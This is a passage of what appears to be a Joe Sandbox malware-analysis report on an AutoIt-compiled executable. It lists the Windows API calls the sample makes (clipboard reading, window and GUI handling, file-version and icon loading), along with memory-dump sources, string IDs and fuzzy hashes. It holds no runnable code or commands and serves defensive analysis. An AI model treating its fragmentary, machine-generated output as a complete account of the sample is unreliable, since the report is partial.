                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                            • InflateRect.USER32 ref: 00433E54
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105,?,?,?,?,?,?,?,?,?,?,00441E27,?,?), ref: 00433EE1
                                                                            • InflateRect.USER32 ref: 00433F13
                                                                            • DrawFocusRect.USER32 ref: 00433F1F
                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1582027408-0
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                            • GetClipboardData.USER32 ref: 0046C64F
                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                            • GetClipboardData.USER32 ref: 0046C6DD
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                            • String ID: HH
                                                                            • API String ID: 589737431-2761332787
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                            • DestroyWindow.USER32 ref: 00456731
                                                                            • CreateWindowExW.USER32 ref: 00456779
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                            • String ID: ($,$tooltips_class32
                                                                            • API String ID: 541082891-3320066284
                                                                            APIs
                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                            • String ID: X+
                                                                            • API String ID: 1744303182-1938338529
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00454DCF
                                                                            • _wcslen.LIBCMT ref: 00454DE2
                                                                            • __wcsicoll.LIBCMT ref: 00454DEF
                                                                            • _wcslen.LIBCMT ref: 00454E04
                                                                            • __wcsicoll.LIBCMT ref: 00454E11
                                                                            • _wcslen.LIBCMT ref: 00454E24
                                                                            • __wcsicoll.LIBCMT ref: 00454E31
                                                                              • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                            • LoadImageW.USER32 ref: 00454E65
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                            • LoadImageW.USER32 ref: 00454EB7
                                                                            • LoadImageW.USER32 ref: 00454EFB
                                                                            • LoadImageW.USER32 ref: 00454F2C
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                            • DestroyIcon.USER32(?), ref: 00454FA2
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 2511167534-1154884017
                                                                            • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                            • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                            • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                            • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$X+
                                                                            • API String ID: 0-479754480
                                                                            • Opcode ID: 05d0114e8ebae6003f4c2574787cb6c924564815b97d0f339d141b1e2ca56e02
                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                            • Opcode Fuzzy Hash: 05d0114e8ebae6003f4c2574787cb6c924564815b97d0f339d141b1e2ca56e02
                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 1503153545-1459072770
                                                                            • Opcode ID: c415717466a75288a316d515b14e5e8f322d0704bbcf92787c1049eb4d752d3b
                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                            • Opcode Fuzzy Hash: c415717466a75288a316d515b14e5e8f322d0704bbcf92787c1049eb4d752d3b
                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                            APIs
                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                            • _wcscpy.LIBCMT ref: 00452871
                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                            • String ID:
                                                                            • API String ID: 2054058615-0
                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                            APIs
                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044880A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: 0$X+
                                                                            • API String ID: 2353593579-479754480
                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                            • GetClientRect.USER32(?,?), ref: 004701FA
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                            • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                            • SetRect.USER32 ref: 004702F1
                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                            • CreateWindowExW.USER32 ref: 0047033E
                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                            • GetClientRect.USER32(?,?), ref: 00470371
                                                                            • GetStockObject.GDI32(00000011), ref: 00470391
                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                            • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 867697134-248962490
                                                                            • Opcode ID: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                                                                            • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                            • Opcode Fuzzy Hash: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                                                                            • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 790654849-1810252412
                                                                            • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                            • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                            • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                            • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                            • API String ID: 0-1896584978
                                                                            • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                            • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                            • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                            • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                            • String ID: X+
                                                                            • API String ID: 2632138820-1938338529
                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID:
                                                                            • API String ID: 1927566239-0
                                                                            • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                            • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                            • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                            • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • GetForegroundWindow.USER32 ref: 0046D7C1
                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
